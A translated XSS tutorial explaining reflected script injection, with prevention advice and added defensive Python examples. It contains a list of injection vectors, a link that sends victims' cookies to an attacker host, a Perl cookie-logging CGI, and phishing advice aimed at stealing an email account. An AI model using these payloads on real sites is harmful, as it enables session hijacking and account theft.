Cross-Site Scripting

Source: Internet
Author: User

I have read an article written by analysts introducing the security risks of cross-site scripting.

I had not read this kind of article carefully before. At present, this kind of article is often published on some security sites, and I just happened to see this one.

With the idea that understanding it is better than not, I translated and sorted it out. The original text is in the collection directory on the home page; where my translation is incorrect, please give more advice.

OK, let's go.

What is XSS?

Cross-site scripting refers to malicious data inserted into the HTML code of a remote web page. The page itself is trusted, but when the browser downloads it, the script embedded in it is interpreted and executed.

Cross-site scripting is usually abbreviated "XSS" rather than "CSS", because "CSS" generally means Cascading Style Sheets, which would be confusing. Even so, when someone mentions a CSS or XSS security vulnerability, it usually refers to cross-site scripting.

What is the difference between XSS and script injection?

In the original article, the author discussed this with a friend (b0iler) and realized that not every attack achieved by inserting script is called an XSS vulnerability; there is another attack method, "script injection". Their differences are as follows:

1. Script injection: the inserted script is saved in the modified remote web page, for example SQL injection or XPath injection.

2. Cross-site scripting is temporary: the script disappears after execution.

What types of scripts can be inserted into remote pages?

Mainstream scripts include the following:

HTML

JavaScript (discussed in this article)

VBScript

ActiveX

Flash

What causes a website to have an XSS security vulnerability?

When many CGI/PHP scripts run, if the script finds that the page requested by the client does not exist or that some other kind of error occurred, the error message is printed into an HTML file and sent to the visitor.

Example: 404 - yourfile.html Not Found!

We usually pay no attention to this message, but now we have to take a closer look, because it is the cause of many XSS vulnerabilities.

Example: www.somesite.tld/cgi-bin/program.cgi?page=downloads.html

This URL is valid, but if we replace downloads.html with brainrawt_owns_me.html, a page containing "404 - brainrawt_owns_me.html Not Found!" is returned to the visitor's browser.

Consider how the script writes our input into an HTML file.

OK. Now it is time to check for the XSS vulnerability!

Note: the following is just an example. The page has an XSS vulnerability, so we can insert JavaScript code into the page. Of course there are many other methods.

www.somesite.tld/cgi-bin/program.cgi?page=<script>alert('XSS_Vuln_Testing')</script>

When we submit this URL, a message box "XSS_Vuln_Testing" is displayed in our browser.

This example is a simple demonstration of the XSS vulnerability; it has no practical significance, but it is sufficient to explain the problem.

Next we analyze the cause of this result. program.cgi does not filter our input effectively, but writes it directly into the 404 error page, so a page like the following is created:

<html>

<b>404</b> - <script>alert('XSS_Vuln_Testing')</script> Not Found!

</html>

The JavaScript is interpreted and executed in the browser, and the result is displayed.
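As an added example (not from the original article, and not the real program.cgi, whose code the page does not show), this Python sketch models the 404 handler just described: one renderer echoes the requested page name unescaped, the other HTML-escapes it, which is the fix the prevention section at the end recommends. The page table, URL and function names are assumptions.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed stand-in for program.cgi's set of real pages (hypothetical).
PAGES = {"downloads.html": "<html><body>Downloads</body></html>"}


def render_404_vulnerable(page_name):
    # Echoes the requested name straight into the error page, which is
    # the behaviour the article attributes to program.cgi.
    return f"<html>\n<b>404</b> - {page_name} Not Found!\n</html>"


def render_404_safe(page_name):
    # html.escape turns < > & " ' into entities, so the browser renders
    # the submitted text instead of interpreting it as markup.
    return f"<html>\n<b>404</b> - {html.escape(page_name)} Not Found!\n</html>"


def handle(url, renderer):
    # Pull the 'page' parameter out of the query string (parse_qs also
    # percent-decodes it, as a CGI would see it) and serve it or 404.
    params = parse_qs(urlparse(url).query, keep_blank_values=True)
    page_name = params.get("page", [""])[0]
    if page_name in PAGES:
        return PAGES[page_name]
    return renderer(page_name)


def contains_live_script(body):
    # True when a real <script> tag (not an entity-escaped one) is present.
    return "<script" in body.lower()


if __name__ == "__main__":
    probe = ("http://www.somesite.tld/cgi-bin/program.cgi"
             "?page=<script>alert('XSS_Vuln_Testing')</script>")
    print(handle(probe, render_404_vulnerable))
    print(handle(probe, render_404_safe))
```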

How to use XSS to complete an attack?

As mentioned above, if a user-submitted request cannot be satisfied, the server-side script writes the input into an HTML file. When the server program does not effectively filter the data written into that HTML file, a malicious script can be inserted into it. When other users follow the link, the script is interpreted and executed by their browser.

Example:

Suppose you find that myemailserver.tld has a CSS (XSS) vulnerability and you want to obtain one of its users' email accounts; for example, our target is b00b.

www.myemailserver.tld/cgi-bin/news.cgi?article=59035

Modify the link to exercise the vulnerability:

www.myemailserver.tld/cgi-bin/news.cgi?article=hax0red

This produces an error page and we get the following message:

Invalid Input! [article=hax0red]

When you insert the following JavaScript code, a message box containing "test" pops up on your screen:

www.myemailserver.tld/cgi-bin/news.cgi?article=<script>alert('test')</script>

The <script> tag is not printed to the screen but executed in the background, because the server-side program does not filter <script>alert('test')</script> effectively, so the script is sent back to the browser and executed on the page.

Let's look at how this vulnerability is used to break into the email account of comrade b00b. First, you must know b00b's email address and understand the role of cookies. Then you can send b00b a malicious link; the intention is to obtain the desired information from the cookies on b00b's machine.

Try to get b00b to visit an article on the myemailserver.tld site, for example: "Dear b00b, look at this beauty, how about her?"

So when poor b00b visits www.myemailserver.tld/cgi-bin/news.cgi?article=<script>[script that steals and saves the cookie]</script>, what happens? The cookie is obtained; you should know what to do!

If this does not work, you can copy the login page of the email server and host it on another system, then guide the user to log in on your malicious page. In this way you can record the user's information and then forward the recorded information to the real email server page, and the unsuspecting user never realizes what actually happened.

A JavaScript script can be inserted into a web page using the following methods:

<snip>

Copied from: gobbles security advisory #33

Here is a cut-n-paste collection of typical JavaScript-injection hacks you may derive some glee from playing with.

<a href="javascript#[code]">

<div onmouseover="[code]">

<input type="image" dynsrc="javascript:[code]"> [IE]

<bgsound src="javascript:[code]"> [IE]

&<script>[code]</script>

&{[code]}; [N4]

<link rel="stylesheet" href="javascript:[code]">

<iframe src="vbscript:[code]"> [IE]

<a href="about:<script>[code]</script>">

<meta http-equiv="refresh" content="0;url=javascript:[code]">

<body onload="[code]">

<div style="background-image: url(javascript:[code]);">

<div style="behaviour: url([link to code]);"> [IE]

<div style="binding: url([link to code]);"> [Mozilla]

<div style="width: expression([code]);"> [IE]

<style type="text/javascript">[code]</style> [N4]

<object classid="clsid:..." codebase="javascript:[code]"> [IE]

<style><!--</style><script>[code]//--></script>

<![CDATA[<!--]]><script>[code]//--></script>

<!--><script>[code]</script><!-->

<script>[code]</script>

<xml src="javascript:[code]">

<xml id="X"><a><b><script>[code]</script>;</b></a></xml>

<div datafld="B" dataformatas="html" datasrc="#X"></div>

\xC0\xBCscript>[code]\xC0\xBC/script> [UTF-8; IE, Opera]

---- Copied from gobbles security advisory #33 ----

</snip>

An example of getting a cookie and recording it:

Note: for this to work, your browser must be allowed to accept cookies sent by the http://website.tld site. When I tested the following, I used a JavaScript cookie creator to create the cookie, and that JavaScript was stored in the index.html file.

OK, the following assumes that http://website.tld has the XSS security risk, and the vulnerable link is:

http://website.tld/program.cgi?input=<evil javascript>

We create a link:

http://website.tld/program.cgi?input=<script>document.location='http://yoursite.tld/cgi-bin/evil_cookie_logger.cgi?'+document.cookie</script>

Then let a user who has the site's cookie saved access the link.

This is our CGI script; its function is to record the user's cookie:

--------- evil_cookie_logger.cgi -----------

#!/usr/bin/perl
# evil_cookie_logger.cgi
# Remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing
# cross-site scripting vulnerabilities.

# The query string carries whatever the injected script appended
# (document.cookie), percent-encoded by the browser.
$borrowed_info = $ENV{'QUERY_STRING'};
# Decode %XX escapes back to the raw characters.
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
open(EVIL_COOKIE_LOG, ">evil_cookie_log") or print "Content-type: text/html\n\nsomething went wrong\n";
print EVIL_COOKIE_LOG "$borrowed_info\n";
# Send an empty response so the browser shows nothing unusual.
print "Content-type: text/html\n\n";
close(EVIL_COOKIE_LOG);

------------------------------------------

The script first obtains the cookie through $ENV{'QUERY_STRING'} and stores it in the $borrowed_info variable, then writes the cookie information to the evil_cookie_log file opened by open(EVIL_COOKIE_LOG, ">evil_cookie_log").

Note: the above JavaScript may not execute on some browsers or sites; this was just for testing on my own site.

How to prevent XSS attacks?

1. Disable JavaScript in your web browser.

2. Developers should carefully review their code and perform valid checks on submitted input data, such as "<" and ">". You can convert "<" and ">" to "&lt;" and "&gt;".

Note: Due to the diversity of cross-site scripting (XSS) vulnerabilities, programmers must understand which specific characters need to be filtered; this mainly depends on the function of the program being developed. We recommend filtering out all metacharacters, including "=".

For potential victims: do not follow links that contain <script> characters; legitimate URLs normally do not include any script elements.
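As a defender-side complement to the advice above (an added example, not from the original article), this Python snippet scans web-server access-log lines for request targets that carry the script-injection markers the article describes, percent-decoding them first so encoded probes are not missed. The log lines are constructed, and the marker list is a heuristic assumption rather than a complete filter.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in combined-log shape (not from the
# page); lines 2 and 3 carry the kind of probe shown in the article.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2003:10:00:00 +0000] "GET /cgi-bin/program.cgi?page=downloads.html HTTP/1.0" 200 512
10.0.0.9 - - [01/Jan/2003:10:00:01 +0000] "GET /cgi-bin/program.cgi?page=%3Cscript%3Ealert('x')%3C/script%3E HTTP/1.0" 404 188
10.0.0.9 - - [01/Jan/2003:10:00:02 +0000] "GET /cgi-bin/news.cgi?article=<SCRIPT>document.location='http://yoursite.tld/?'+document.cookie</SCRIPT> HTTP/1.0" 404 230
10.0.0.7 - - [01/Jan/2003:10:00:03 +0000] "GET /cgi-bin/news.cgi?article=59035 HTTP/1.0" 200 4096
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Heuristic markers for the vector families in the list above: script tags,
# javascript: URLs inside attributes, and inline event handlers.
MARKERS = (
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),
)


def decode_target(target):
    # Percent-decode until stable so double-encoded %253C is seen as <,
    # the same way the CGI script would after its own decoding.
    prev = None
    while prev != target:
        prev, target = target, unquote(target)
    return target


def suspicious_requests(log_text):
    # Returns the decoded request targets that match any marker.
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = decode_target(match.group(1))
        if any(marker.search(target) for marker in MARKERS):
            hits.append(target)
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("possible XSS probe:", hit)
```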
